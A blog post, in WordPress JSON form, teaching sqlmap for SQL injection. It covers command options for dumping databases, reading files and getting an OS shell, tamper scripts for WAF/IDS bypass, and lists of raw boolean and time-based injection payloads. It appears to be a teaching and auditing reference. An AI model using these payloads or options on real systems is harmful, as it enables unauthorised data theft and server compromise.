{"id":236,"date":"2014-08-24T21:27:13","date_gmt":"2014-08-24T21:31:43","guid":{"rendered":"https:\/\/a6941sql-injection2.jpg"},"modified":"2015-07-16T17:06:02","modified_gmt":"2015-07-16T23:06:02","slug":"comandos-sqlmap-ataques-sqli-inyeccion-sql","status":"publish","type":"post","link":"https:\/\/emanuelpaxtian.com\/blog\/comandos-sqlmap-ataques-sqli-inyeccion-sql\/","title":{"rendered":"SQLmap commands: SQLi attacks &#8211; SQL Injection"},"content":{"rendered":"<p><strong>SQLmap<\/strong> is one of the best-known tools for performing SQLi (SQL Injection) attacks, and it is written in Python. SQLmap sends requests to the parameters of the URL you point it at, whether through a GET request, a POST request, cookies, etc. It can exploit every kind of SQLi, such as union-based, time-based blind, boolean-based blind injection, heavy queries, etc.<\/p>\n<p>It can automatically carry out 6 attack techniques:<\/p>\n<ul>\n<li>boolean-based blind<\/li>\n<li>time-based blind<\/li>\n<li>error-based<\/li>\n<li>UNION query<\/li>\n<li>stacked queries<\/li>\n<li>out-of-band<\/li>\n<\/ul>\n<h2>Tutorial &#8211; Basic SQLmap usage manual<\/h2>\n<h4>Errors:<\/h4>\n<p>The error the application returns reveals which engine to pass with <code>--dbms<\/code>:<\/p>\n<div>\n<p>http:\/\/www.elhacker.net\/noticia.php?id=1'<\/p>\n<ul>\n<li><code>--dbms=mysql<\/code><\/li>\n<\/ul>\n<\/div>\n<blockquote class=\"tr_bq\"><p>[..] Error: You have an error in your SQL syntax [..]<\/p><\/blockquote>\n<blockquote class=\"tr_bq\"><p>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [..]<\/p><\/blockquote>\n<ul>\n<li><code>--dbms=mssql<\/code><\/li>\n<\/ul>\n<blockquote class=\"tr_bq\"><p>Microsoft OLE DB Provider for ODBC Drivers error [..]<\/p><\/blockquote>\n<blockquote class=\"tr_bq\"><p>Server Error in '\/' Application. 
Unclosed quotation mark before the character string [..]<\/p><\/blockquote>\n<ul>\n<li><code>--dbms=oracle<\/code><\/li>\n<\/ul>\n<blockquote class=\"tr_bq\"><p>java.sql.SQLException: ORA-00933: SQL command not properly ended at [..]<\/p><\/blockquote>\n<h4>Requirements &#8211; Dependencies<\/h4>\n<ul>\n<li>Python 2.6 or 2.7 (does not work with 3.0)<\/li>\n<li>gzip<\/li>\n<li>ssl<\/li>\n<li>sqlite3<\/li>\n<li>zlib<\/li>\n<\/ul>\n<p>Installation by cloning the git repository:<\/p>\n<blockquote class=\"tr_bq\">\n<pre>git clone git:\/\/github.com\/sqlmapproject\/sqlmap.git<\/pre>\n<pre>cd sqlmap<\/pre>\n<\/blockquote>\n<p>Usage:<\/p>\n<blockquote class=\"tr_bq\">\n<pre><code>python sqlmap.py [options]<\/code><\/pre>\n<\/blockquote>\n<ul>\n<li><code>--url<\/code> (<code>-u<\/code>) URL containing the vulnerable parameter, e.g. elhacker.net\/noticia.php?id=1<\/li>\n<li><code>-p<\/code> test another parameter for injection, e.g. elhacker.net\/noticia.php?id=1&amp;user<\/li>\n<li><code>--data<\/code> the fields to test when there is a GET\/POST form<\/li>\n<li><code>--level=n<\/code> five levels, by difficulty<\/li>\n<li><code>--dbs<\/code> list the databases<\/li>\n<li><code>--dbms<\/code> database engine (MySQL, SQL Server, etc.)<\/li>\n<li><code>-D<\/code> the database to use (-Database)<\/li>\n<li><code>--tables<\/code> show the available tables<\/li>\n<li><code>-T<\/code> table name, <code>--columns<\/code> its columns<\/li>\n<li><code>--dump<\/code> dump the results, i.e. show the contents of the tables<\/li>\n<li><code>-C<\/code> (Columns) columns to show<\/li>\n<li><code>--wizard<\/code> run a wizard<\/li>\n<li><code>--threads=n<\/code> number of threads (default 1)<\/li>\n<li><code>--delay=n<\/code> seconds to wait between 
HTTP requests<\/li>\n<li><code>--current-db<\/code> the database currently in use<\/li>\n<li><code>--current-user<\/code> show the user the queries run as<\/li>\n<li><code>--is-dba --current-db<\/code> check whether that user is the DBA of the database<\/li>\n<li><code>--privileges<\/code> show the user's privileges (alter, create, drop, execute)<\/li>\n<li><code>--file-read<\/code> path: read files<\/li>\n<li><code>--sql-shell<\/code> get an SQL shell<\/li>\n<li><code>--os-shell<\/code> get a shell on the server (asp is 1, aspx 2, jsp 3, php 4), provided you hold sufficient privileges and have an FPD (Full Path Disclosure)<\/li>\n<li><code>--headers=<\/code> browser headers<\/li>\n<li><code>--random-agent<\/code> random browser headers (User-Agent)<\/li>\n<li><code>--time-sec=<\/code> seconds to delay the DBMS response (default 5)<\/li>\n<li><code>--technique=<\/code> selects the technique to use for the injection (B &#8211; E &#8211; U &#8211; S &#8211; T &#8211; Q): 
Boolean-based, Error-based, Union, Stacked queries, Time-based, Inline queries<\/li>\n<li><code>--flush-session<\/code><\/li>\n<\/ul>\n<ul>\n<li>If the SQLi is Blind Boolean-based, specify it with a &quot;B&quot;<\/li>\n<li>If the SQLi is Error-based \/ Double Query, specify it with an &quot;E&quot;<\/li>\n<li>If the SQLi is Union-based, specify it with a &quot;U&quot;<\/li>\n<li>If the SQLi is Stacked queries, specify it with an &quot;S&quot;<\/li>\n<li>If the SQLi is Time-based, specify it with a &quot;T&quot;<\/li>\n<li>If the SQLi is Inline queries, specify it with a &quot;Q&quot;<\/li>\n<\/ul>\n<ul>\n<li><code>--forms<\/code> have sqlmap find the form fields automatically<\/li>\n<li><code>--proxy=<\/code> use a proxy server<\/li>\n<li><code>--sql-query<\/code> add an SQL query<\/li>\n<li><code>--tamper=<\/code> obfuscation and bypass scripts (e.g. space2mysqlblank.py, charencode.py, base64encode.py, randomcomments.py, etc.)<\/li>\n<li><code>--check-tor<\/code> check that the Tor anonymity network is in use<\/li>\n<li><code>--tor-port<\/code> set a Tor proxy port other than the default<\/li>\n<li><code>--tor-type<\/code> set the Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)<\/li>\n<\/ul>\n<p>Full list in the official documentation:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/sqlmapproject\/sqlmap\/wiki\/Usage\">https:\/\/github.com\/sqlmapproject\/sqlmap\/wiki\/Usage<\/a><\/li>\n<\/ul>\n<p><a href=\"https:\/\/github.com\/aramosf\/sqlmap-cheatsheet\/blob\/master\/sqlmap%20cheatsheet%20v1.0-SBD.pdf\"><strong>Download the SQLMap cheatsheet<\/strong><\/a>, courtesy of SecurityByDefault:<\/p>\n<p>SQLMap compares the page without any injection against the page with the injection and, depending 
on the variation between them, returns True or False (True if a certain ratio is exceeded, False otherwise).<\/p>\n<p>The following characters can be used after the SQL injection:<\/p>\n<blockquote class=\"tr_bq\">\n<table>\n<tbody>\n<tr>\n<td class=\"code\">#<\/td>\n<td>Hash comment<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">\/*<\/td>\n<td>C-style comment<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">-- -<\/td>\n<td>SQL comment<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">;<\/td>\n<td>Nullbyte<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">`<\/td>\n<td>Backtick<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/blockquote>\n<p>Finding the SQL server version (enumeration).<\/p>\n<p>With SQLMap:<\/p>\n<ul>\n<li><code>--all<\/code><\/li>\n<li><code>-b<\/code> or <code>--banner<\/code> (version)<\/li>\n<li><code>--current-user<\/code><\/li>\n<li><code>--current-db<\/code><\/li>\n<li><code>--hostname<\/code><\/li>\n<\/ul>\n<p>Equivalent SQL:<\/p>\n<blockquote class=\"tr_bq\"><p>VERSION()<br \/>\n@@VERSION<br \/>\n@@GLOBAL.VERSION<\/p><\/blockquote>\n<p>Relevant information:<\/p>\n<blockquote class=\"tr_bq\"><p>@@HOSTNAME<br \/>\nUUID() &#8211;&gt; MAC address<\/p><\/blockquote>\n<p>Conditionals<\/p>\n<blockquote class=\"tr_bq\">\n<table>\n<tbody>\n<tr>\n<td class=\"code\">CASE<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">IF()<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">IFNULL()<\/td>\n<\/tr>\n<tr>\n<td class=\"code\">NULLIF()<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/blockquote>\n<p>Reading files:<\/p>\n<p>With SQLMap:<\/p>\n<ul>\n<li><code>--file-read=<\/code><\/li>\n<li><code>--file-write=<\/code><\/li>\n<li><code>--file-dest=<\/code><\/li>\n<\/ul>\n<p>Equivalent SQL:<\/p>\n<blockquote class=\"tr_bq\"><p>LOAD_FILE()<br \/>\nINTO 
OUTFILE\/DUMPFILE<\/p><\/blockquote>\n<p>Obfuscation (evading filters)<\/p>\n<blockquote class=\"tr_bq\"><p>09 Horizontal Tab<br \/>\n0A New Line<br \/>\n0B Vertical Tab<br \/>\n0C New Page<br \/>\n0D Carriage Return<br \/>\nA0 Non-breaking Space<br \/>\n20 Space<\/p><\/blockquote>\n<p>Characters accepted after AND\/OR<\/p>\n<blockquote class=\"tr_bq\"><p>20 Space<br \/>\n2B +<br \/>\n2D -<br \/>\n7E ~<br \/>\n21 !<br \/>\n40 @<\/p><\/blockquote>\n<h2>Google Dorks<\/h2>\n<ul>\n<li><code>-g<\/code> GOOGLEDORK<\/li>\n<\/ul>\n<h3>WAF (Web Application Firewall) \/ IDS bypass<\/h3>\n<p>Some scripts let us, to a certain extent, bypass certain WAF\/IDS such as mod_security or Suhosin, which lets us hide the payload. 
These scripts belong to the SQLmap tool and live in its <strong>tamper<\/strong> folder.<\/p>\n<ul>\n<li><code>--tamper<\/code> : selects the kind of manipulation that the chosen script applies to the injection.<\/li>\n<\/ul>\n<ul>\n<li>apostrophemask.py<\/li>\n<li>percentage.py<\/li>\n<li>apostrophenullencode.py<\/li>\n<li>randomcase.py<\/li>\n<li>appendnullbyte.py<\/li>\n<li>randomcomments.py<\/li>\n<li>base64encode.py<\/li>\n<li>securesphere.py<\/li>\n<li>between.py<\/li>\n<li>space2comment.py<\/li>\n<li>bluecoat.py<\/li>\n<li>space2dash.py<\/li>\n<li>chardoubleencode.py<\/li>\n<li>space2hash.py<\/li>\n<li>charencode.py<\/li>\n<li>space2morehash.py<\/li>\n<li>charunicodeencode.py<\/li>\n<li>space2mssqlblank.py<\/li>\n<li>concat2concatws.py<\/li>\n<li>space2mssqlhash.py<\/li>\n<li>equaltolike.py<\/li>\n<li>space2mysqlblank.py<\/li>\n<li>greatest.py<\/li>\n<li>space2mysqldash.py<\/li>\n<li>halfversionedmorekeywords.py<\/li>\n<li>space2plus.py<\/li>\n<li>ifnull2ifisnull.py<\/li>\n<li>space2randomblank.py<\/li>\n<li>__init__.py<\/li>\n<li>sp_password.py<\/li>\n<li>lowercase.py<\/li>\n<li>unionalltounion.py<\/li>\n<li>modsecurityversioned.py<\/li>\n<li>unmagicquotes.py<\/li>\n<li>modsecurityzeroversioned.py<\/li>\n<li>versionedkeywords.py<\/li>\n<li>multiplespaces.py<\/li>\n<li>versionedmorekeywords.py<\/li>\n<li>nonrecursivereplacement.py<\/li>\n<\/ul>\n<p>For example, the &quot;space2morehash.py&quot; tamper replaces, in the URL-encoded payload, the functions CHAR(), USER(), CONCAT() with FUNCTION%23randomText%0A()<\/p>\n<p>space2hash.py and space2mysqlblank.py can be used when the engine is MySQL, and charunicodeencode.py and percentage.py to obfuscate the payload on ASP\/ASP.NET engines.<\/p>\n<p>The charencode script can be very useful when attacking a website protected by a WAF that blocks certain words, such as 
<strong>column_name<\/strong>, <strong>table_name<\/strong>, <strong>group_concat<\/strong>, etc.<\/p>\n<ul>\n<li><code>-v<\/code> : sets the tool's verbosity level: 0-6 (default 1)<\/li>\n<li><code>--batch<\/code> : so the user does not have to type any input once the injections have started (the Y\/N prompts are skipped).<\/li>\n<li><code>--risk<\/code> : risk of the tests to perform (0-3, default 1)<\/li>\n<li><code>--level<\/code> : level of the tests to perform (1-5, default 1)<\/li>\n<\/ul>\n<div>\n<h2>Payloads<\/h2>\n<p>The payloads are stored in XML format; example template: xml\/payloads.xml<\/p>\n<p><a href=\"https:\/\/github.com\/sqlmapproject\/sqlmap\/blob\/master\/xml\/payloads.xml\">https:\/\/github.com\/sqlmapproject\/sqlmap\/blob\/master\/xml\/payloads.xml<\/a><\/p>\n<p>Boolean based<\/p>\n<blockquote class=\"tr_bq\"><p>999999 or 1=1 or 1=1<br \/>\n' or 1=1 or '1'='1<br \/>\n&quot; or 1=1 or &quot;1&quot;=&quot;1<br \/>\n999999) or 1=1 or (1=1<br \/>\n') or 1=1 or ('1'='1<br \/>\n&quot;) or 1=1 or (&quot;1&quot;=&quot;1<br \/>\n999999)) or 1=1 or ((1=1<br \/>\n')) or 1=1 or (('1'='1<br \/>\n&quot;)) or 1=1 or ((&quot;1&quot;=&quot;1<br \/>\n999999))) or 1=1 or (((1<br \/>\n'))) or 1=1 or ((('1'='1<br \/>\n&quot;))) or 1=1 or (((&quot;1&quot;=&quot;1<\/p><\/blockquote>\n<p>Time-based MySQL<\/p>\n<blockquote class=\"tr_bq\"><p>(select benchmark(15000000,md5(0x4e446b6e))-9999) as test<br \/>\nbenchmark(15000000,md5(0x4e446b6e))-9999<br \/>\n9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999<br \/>\n9999&quot; or benchmark(15000000,md5(0x4e446b6e)) or 
&quot;0&quot;=&quot;9999<\/p><\/blockquote>\n<p>SQL Server (mssql)<\/p>\n<blockquote class=\"tr_bq\"><p>(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test<br \/>\n(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)<br \/>\n9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999<br \/>\n9999&quot;+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+&quot;9999<\/p><\/blockquote>\n<div>\n<h2>Sqlmap plugin for BurpSuite<\/h2>\n<blockquote class=\"tr_bq\"><p>When we audit a website, the first thing we usually do is put an intermediate proxy in place so we have more control over what we send to it. For various reasons I use <a href=\"http:\/\/portswigger.net\/burp\/\">BurpSuite<\/a> as the proxy.<br \/>\nDon't you think it would be great if, while auditing a site, we could redirect a specific URL or request straight to <a href=\"http:\/\/sqlmap.sourceforge.net\/\">sqlmap<\/a> with a simple mouse <em>click<\/em>? Yes, right? I think so too. That is why I developed this <em>plugin<\/em>, to do exactly that.<\/p><\/blockquote>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>SQLmap is one of the best-known tools for performing SQLi (SQL Injection) attacks, and it is written in Python. 
SQLmap sends requests to the parameters of a URL that&hellip;<\/p>\n","protected":false},"author":1,"featured_media":713,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,10],"tags":[],"class_list":["post-236","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","category-seguridad"],"_links":{"self":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/comments?post=236"}],"version-history":[{"count":0,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/posts\/236\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media\/713"}],"wp:attachment":[{"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/media?parent=236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/categories?post=236"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/emanuelpaxtian.com\/blog\/wp-json\/wp\/v2\/tags?post=236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}